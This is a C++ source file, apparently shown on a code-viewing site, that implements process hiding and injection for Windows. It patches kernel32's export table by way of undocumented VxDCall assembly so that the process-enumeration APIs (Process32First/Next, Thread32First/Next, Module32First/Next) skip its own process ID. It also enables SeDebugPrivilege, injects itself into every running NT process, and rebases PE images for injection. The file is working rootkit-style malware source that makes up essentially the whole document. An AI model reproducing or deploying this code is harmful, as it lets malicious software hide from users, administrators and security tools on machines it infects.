📄 api.cpp
字号:
// Good, we have an export table. Lets get it.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get ordinal of desired function
int nOrdinal;
if(HIWORD((DWORD)lpProcName)==0) {
nOrdinal=(LOWORD((DWORD)lpProcName)) - ped->Base;
} else {
// Go through name table and find appropriate ordinal
int i,count;
DWORD *pdwNamePtr;
WORD *pwOrdinalPtr;
count=ped->NumberOfNames;
pdwNamePtr=(DWORD *)RVATOVA(hModule,ped->AddressOfNames);
pwOrdinalPtr=(WORD *)RVATOVA(hModule,ped->AddressOfNameOrdinals);
for(i=0;i<count;i++) {
// XXX should be a binary search, but, again, fuck it.
char *svName;
svName=(char *)RVATOVA(hModule,*pdwNamePtr);
if(lstrcmp(svName,lpProcName)==0) {
nOrdinal=*pwOrdinalPtr;
break;
}
pdwNamePtr++;
pwOrdinalPtr++;
}
if(i==count) return FALSE;
}
// Replace with different virtual address
// Look up RVA of this ordinal and replace with RVA of other function
DWORD *pAddrTable=(DWORD *)RVATOVA(hModule,ped->AddressOfFunctions);
DWORD dwOldAddr=(DWORD) RVATOVA(hModule,(pAddrTable[nOrdinal]));
pAddrTable[nOrdinal]=(DWORD) VATORVA(hModule,((DWORD)fpAddr));
return (FARPROC) dwOldAddr;
}
// Like GetProcAddress(), returns null if the procedure/ordinal is not there, otherwise returns function addr.
FARPROC GetDLLProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
if(hModule==NULL) return NULL;
// Get header
PIMAGE_OPTIONAL_HEADER poh;
poh = (PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET (hModule);
// Get number of image directories in list
int nDirCount;
nDirCount=poh->NumberOfRvaAndSizes;
if(nDirCount<16) return FALSE;
// - Sift through export table -----------------------------------------------
if(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size==0) return NULL;
// Good, we have an export table. Lets get it.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get ordinal of desired function
int nOrdinal;
if(HIWORD((DWORD)lpProcName)==0) {
nOrdinal=(LOWORD((DWORD)lpProcName)) - ped->Base;
} else {
// Go through name table and find appropriate ordinal
int i,count;
DWORD *pdwNamePtr;
WORD *pwOrdinalPtr;
count=ped->NumberOfNames;
pdwNamePtr=(DWORD *)RVATOVA(hModule,ped->AddressOfNames);
pwOrdinalPtr=(WORD *)RVATOVA(hModule,ped->AddressOfNameOrdinals);
for(i=0;i<count;i++) {
// XXX should be a binary search, but, again, fuck it.
char *svName;
svName=(char *)RVATOVA(hModule,*pdwNamePtr);
if(lstrcmp(svName,lpProcName)==0) {
nOrdinal=*pwOrdinalPtr;
break;
}
pdwNamePtr++;
pwOrdinalPtr++;
}
if(i==count) return NULL;
}
// Look up RVA of this ordinal
DWORD *pAddrTable;
DWORD dwRVA;
pAddrTable=(DWORD *)RVATOVA(hModule,ped->AddressOfFunctions);
dwRVA=pAddrTable[nOrdinal];
// Check if it's a forwarder, or a local addr
// XXX Should probably do this someday. Just don't define forwarders. You're
// XXX not loading kernel32.dll with this shit anyway.
DWORD dwAddr;
dwAddr=(DWORD) RVATOVA(hModule,dwRVA);
return (FARPROC) dwAddr;
}
BOOL CAPI::HideProcessIn9X(LPTHREAD_START_ROUTINE pMyMainProcess)
{
HMODULE hModule=GetModuleHandle("kernel32.dll");
// Get undocumented VxDCall procedure
FARPROC VxDCall=GetDLLProcAddress(hModule,(LPCSTR)1);
if(!VxDCall)
{
DMsgBox("VxDCall is null");
return FALSE;
}
REGSERVICEPROC pfRegist=(REGSERVICEPROC)GetProcAddress(hModule,"RegisterServiceProcess");
if(!pfRegist)
return FALSE;
pfRegist(NULL,1);
// Check for kernel32.dll export table
PIMAGE_OPTIONAL_HEADER poh=(PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(hModule);
DWORD dwSize=poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
if(dwSize==0)
return NULL;
// Good, we have an export table. Lets get it.
PIMAGE_EXPORT_DIRECTORY ped;
ped=(IMAGE_EXPORT_DIRECTORY *)RVATOVA(hModule,poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Change protection on kernel32.dll export table (make writable)
// (can't use "VirtualProtect")
DWORD dwFirstPage, dwNumPages;
dwFirstPage=((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))/4096;
dwNumPages=((( (((DWORD)RVATOVA(hModule,ped->AddressOfFunctions))-(dwFirstPage*4096)+ped->NumberOfFunctions)) *4)+4095)/4096;
//char sz[200];
//sprintf(sz,"hModule,VxDCall %d,dwFirstPage %d dwNumPages %d",hModule,VxDCall,dwFirstPage,dwNumPages);
//DMsgBox(sz);
_asm {
push 020060000h // PC_WRITEABLE | PC_USER | PC_STATIC
push 0FFFFFFFFh // Keep all previous bits
push dword ptr [dwNumPages] // dword ptr [mbi+0Ch] # of pages
push dword ptr [dwFirstPage] // dword ptr [ped] page #
push 1000Dh // _PageModifyPermissions (win32_service_table #)
call dword ptr [VxDCall] // VxDCall0
}
// Get shared memory
DWORD dwCodeSize=((DWORD)&EndOfHappyCode) - ((DWORD)&StartOfHappyCode);
LPVOID lpBase;
lpBase=VirtualAlloc((LPVOID)0x9CDC0000,dwCodeSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(lpBase!=(LPVOID)0x9CDC0000) lpBase=(LPVOID)0x9CDC0000;
// Copy code into shared memory
memcpy(lpBase,(void *)(&StartOfHappyCode),dwCodeSize);
// Store procedure addresses
DWORD dwOldAddress[6],dwCurPid;
dwCurPid=GetCurrentProcessId();
dwOldAddress[0]=(DWORD)GetProcAddress(hModule,"Process32First");
dwOldAddress[1]=(DWORD)GetProcAddress(hModule,"Process32Next");
dwOldAddress[2]=(DWORD)GetProcAddress(hModule,"Thread32First");
dwOldAddress[3]=(DWORD)GetProcAddress(hModule,"Thread32Next");
dwOldAddress[4]=(DWORD)GetProcAddress(hModule,"Module32First");
dwOldAddress[5]=(DWORD)GetProcAddress(hModule,"Module32Next");
// Modify code to correct addresses
DWORD i;
for(i=0;i<(dwCodeSize-4);i++) {
DWORD *dwPtr=(DWORD *)((BYTE *)lpBase+i);
if (*dwPtr==0x11111111) *dwPtr=dwCurPid;
else if(*dwPtr==0x22222222) *dwPtr=(DWORD)dwOldAddress[0];
else if(*dwPtr==0x33333333) *dwPtr=(DWORD)dwOldAddress[1];
else if(*dwPtr==0x44444444) *dwPtr=(DWORD)dwOldAddress[2];
else if(*dwPtr==0x55555555) *dwPtr=(DWORD)dwOldAddress[3];
else if(*dwPtr==0x66666666) *dwPtr=(DWORD)dwOldAddress[4];
else if(*dwPtr==0x77777777) *dwPtr=(DWORD)dwOldAddress[5];
}
// Now we modify the export table to point to our replacement code
SetDLLProcAddress(hModule,"Process32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32First)));
SetDLLProcAddress(hModule,"Process32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeProcess32Next)));
SetDLLProcAddress(hModule,"Thread32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32First)));
SetDLLProcAddress(hModule,"Thread32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeThread32Next)));
SetDLLProcAddress(hModule,"Module32First",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32First)));
SetDLLProcAddress(hModule,"Module32Next",(FARPROC)RVATOVA(lpBase,VATORVA(&StartOfHappyCode,(FARPROC)&FakeModule32Next)));
pMyMainProcess(GetModuleHandle(NULL));
return TRUE;
}
/*******************************************************************
********************************************************************/
BOOL CAPI::EnableDebugPriv()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
DMsgBox("OPT() failed");
return FALSE;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
{
DMsgBox("LPV() failed");
CloseHandle( hToken );
return FALSE;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{
DMsgBox("ATP() failed");
CloseHandle( hToken );
return FALSE;
}
CloseHandle( hToken );
return TRUE;
}
long CAPI::HideProcessInNT_2_All(LPTHREAD_START_ROUTINE pMyMainProcess)
{
_s_process_info_ spInfo;
memset(&spInfo,0,sizeof(spInfo));
long lNum=GetAll(&spInfo);
long lRet=0;
for(int i=0;i<lNum;i++)
{
if(HideProcessInNTbyID(spInfo.lProcessID[i],pMyMainProcess))
{
lRet++;
#ifdef _DEBUG
char szMsg[200];
sprintf(szMsg,"hide in %s,id=%d ok!",spInfo.szName[i],spInfo.lProcessID[i]);
DMsgBox(szMsg);
#endif
}
else
{
#ifdef _DEBUG
char szMsg[200];
sprintf(szMsg,"hide in %s,id=%d error!",spInfo.szName[i],spInfo.lProcessID[i]);
DMsgBox(szMsg);
#endif
}
}
return lRet;
}
BOOL CAPI::FixRelocationTable(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase)
{
//char a;UINT xxx;
// if(lMyBase==lNewBase)
// return TRUE;//neednt fix
DWORD lAdd=lNewBase-lMyBase;
IMAGE_DOS_HEADER *ppeDosHead=(IMAGE_DOS_HEADER *)szBuf;//dos head
IMAGE_NT_HEADERS32 *ppeHead=(IMAGE_NT_HEADERS32 *)(szBuf+ppeDosHead->e_lfanew);//PE head
ppeHead->OptionalHeader.ImageBase=lNewBase;
//int nSize=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
char* p=ppeHead->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress+szBuf;
IMAGE_RELOCATION* relocblock=(IMAGE_RELOCATION*)(p);
//IMAGE_BASE_RELOCATION
ppeHead->OptionalHeader.ImageBase=lNewBase;
while(relocblock->VirtualAddress)
{
void* page = (void *)((UINT)szBuf + (UINT)relocblock->VirtualAddress);
long count = (relocblock->SymbolTableIndex - 8)/2;
for(int i=0; i<count; i++) {
int n=*((WORD*)((char*)(&relocblock->Type)+i*sizeof(WORD)));
int offset = n & 0xFFF;
int type = n >> 12;
//---------------------------
long test =(long)(char*)page+offset;
test-=(long)szBuf;
test+=lNewBase;
char szMsg[200];
sprintf(szMsg,"point->0X%X sozeofblock %d=0x%X",test,count,count);
//DMsgBox(szMsg);
//if((test>=0x3142000)&&(test<=0x3142004))
//{
// test=test;
//}
//---------------------------
switch(type) {
case IMAGE_REL_BASED_ABSOLUTE:
/* a NOP */
break;
case IMAGE_REL_BASED_HIGH:
*(UINT *)((UINT)page+offset) += HIWORD(lAdd);
break;
case IMAGE_REL_BASED_LOW:
*(UINT *)((UINT)page+offset) += LOWORD(lAdd);
break;
case IMAGE_REL_BASED_HIGHLOW:
*(UINT *)((UINT)page+offset) += lAdd;
//----------------------------
//xxx=*(UINT *)((UINT)page+offset);
//xxx-=lNewBase;
//xxx+=(long)szBuf;
//a=((char*)(xxx))[0];
//if(((a>='a')&&(a<='z'))||((a>='A')&&(a<='Z')))
//DMsgBox((char*)(xxx));
//-----------------------------
break;
default:
//("Unknown fixup type\n");
break;
}
}
relocblock = (IMAGE_RELOCATION *)((BYTE *)relocblock +
relocblock->SymbolTableIndex);
}
return TRUE;
}
//#include "Imagehlp.h"
BOOL CAPI::FixRelocationTable2(char *szBuf, long lLen,unsigned long lMyBase,unsigned long lNewBase)
{
/* BOOL bRet=ReBaseImage(
PSTR CurrentImageName,
PSTR SymbolPath,
BOOL fReBase,
BOOL fRebaseSysfileOk,
BOOL fGoingDown,
ULONG CheckImageSize,
ULONG *OldImageSize,
ULONG_PTR *OldImageBase,
ULONG *NewImageSize,
ULONG_PTR *NewImageBase,
ULONG TimeStamp
)*/
return TRUE;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -